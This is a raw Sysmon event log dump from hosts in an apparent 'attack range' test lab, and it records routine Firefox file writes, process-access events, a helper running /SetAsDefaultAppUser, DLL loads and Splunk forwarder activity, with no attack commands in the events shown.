23542300x800000000000000042464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.295{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=3997434CC0CFCDA973EB90686C762FA7,SHA256=40C3F669118B2E64EA0998BA62DC8E6A7A82E617903CA463DEEC06817275ED85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.117{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.117{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.117{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 354300x800000000000000042460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.393{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcpfalsefalse127.0.0.1-56314-false127.0.0.1-56313- 354300x800000000000000042459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:40.393{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse127.0.0.1-56314-false127.0.0.1-56313- 23542300x800000000000000042458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.094{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.008{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.000{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016728Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:43.812{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BFFAD864A6892EAA01955BF09D1DE9E,SHA256=083565C8D1AA7130BFA09B03C151C5F86DDCCE1C10E7790E69D47A1832FD73AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.935{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.939{FE4C2B44-E493-63C7-3A06-00000000AF02}7108C:\Windows\System32\ApplicationFrameHost.exe10.0.14393.4169 (rs1_release.210107-1130)Application Frame HostMicrosoft® Windows® Operating SystemMicrosoft CorporationApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=6F27A494DEAC85725B87BFBC0656A382,SHA256=B93BBD0B6FC7678FD815CC1DAA538F3923C144776CB7C419BC44AF40963E9E89,IMPHASH=3F27A5C187DCE51FC872862DA48D5BCF{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x800000000000000042818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.919{FE4C2B44-E493-63C7-3906-00000000AF02}4820ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\uninstall\helper.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nsj8D16.tmp\System.dllMD5=B361682FA5E6A1906E754CFA08AA8D90,SHA256=B711C4F17690421C9DC8DDB9ED5A9DDC539B3A28F11E19C851E25DCFC7701C04,IMPHASH=FC0224E99E736751432961DB63A41B76truefalse - insufficient disk space 23542300x800000000000000042817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.919{FE4C2B44-E493-63C7-3906-00000000AF02}4820ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\uninstall\helper.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nsj8D16.tmp\CityHash.dllMD5=2021ACC65FA998DAA98131E20C4605BE,SHA256=C299A0A71BF57EB241868158B4FCFE839D15D5BA607E1BDC5499FDF67B334A14,IMPHASH=720DB9870D7EDF191C6F2F6CFA752E0Etruefalse - insufficient disk space 10341000x800000000000000042816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.919{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+7d960|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd 10341000x800000000000000042815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.904{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7d441|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEB3B17)|UNKNOWN(FFFFF3D9DFEAE1A1)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000042814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDLL2023-01-18 12:22:43.904{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nsj8D16.tmp\CityHash.dll2023-01-18 12:22:43.904 11241100x800000000000000042813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localDLL2023-01-18 12:22:43.904{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nsj8D16.tmp\System.dll2023-01-18 12:22:43.904 10341000x800000000000000042812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.888{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.888{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.835{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.835{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.835{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.835{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.835{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.835{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+475205b|C:\Program Files\Mozilla Firefox\xul.dll+4752c06|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+1d18d20|C:\Program Files\Mozilla Firefox\xul.dll+188f2db|C:\Program Files\Mozilla Firefox\xul.dll+1a7c83c|C:\Program Files\Mozilla Firefox\xul.dll+1886716|C:\Program Files\Mozilla Firefox\xul.dll+1b83ef7|C:\Program Files\Mozilla Firefox\xul.dll+1b7b784|C:\Program Files\Mozilla Firefox\xul.dll+18661eb|C:\Program Files\Mozilla Firefox\xul.dll+1946f04|C:\Program Files\Mozilla Firefox\xul.dll+1c13ed|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a9651a|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac0339 154100x800000000000000042801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:43.821{FE4C2B44-E493-63C7-3906-00000000AF02}4820C:\Program Files\Mozilla Firefox\uninstall\helper.exe109.0Firefox HelperFirefoxMozilla Corporationhelper.exe"C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppUserC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=1B2B65E583B1CED309146C9453BDA496,SHA256=08B206C941EBD10AD4820BF82644E77EE1D2F95D567950939976507FE4019F8C,IMPHASH=6E7F9A29F2C85394521A08B9F31F6275{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 